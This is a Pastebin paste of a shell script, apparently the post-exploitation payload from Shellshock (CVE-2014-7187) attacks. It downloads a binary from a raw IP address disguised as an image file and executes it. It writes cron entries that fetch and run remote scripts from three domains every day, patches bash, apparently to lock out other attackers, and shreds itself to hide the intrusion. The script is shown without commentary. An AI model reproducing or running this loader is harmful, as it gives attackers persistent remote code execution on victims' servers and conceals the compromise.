Advertisement
Guest User

Scanned by shellshocker exploit

a guest
Oct 3rd, 2014
985
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.67 KB | None | 0 0
  1. #!/bin/sh
  2. starts=`pwd`
  3. str=`date | md5sum | head -c8`
  4. wget http://82.165.131.9/imgs.png -O derp;chmod +x derp;./derp;rm -rf derp
  5.  
  6.  
  7. echo "@daily wget http://xfsdfadsdgfs.tba.pw/update -O /tmp/update;sh /tmp/update;rm -rf /tmp/update">>/tmp/cc
  8. echo "@daily wget http://update2.x24hr.com/update2 -O /tmp/update2;sh /tmp/update2;rm -rf /tmp/update2">>/tmp/cc
  9. echo "@daily wget http://update.mrbonus.com/update3 -O /tmp/update3;sh /tmp/update3;rm -rf /tmp/update3">>/tmp/cc
  10. crontab /tmp/cc
  11. rm -rf /tmp/cc
  12. apt-get update&
  13. apt-get install --only-upgrade bash&
  14. yum -y update bash&
  15. zypper --non-interactive patch --cve=CVE-2014-7187&
  16.  
  17.  
  18. shred -f -u $starts/$0
  19. rm -f $starts/$0
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement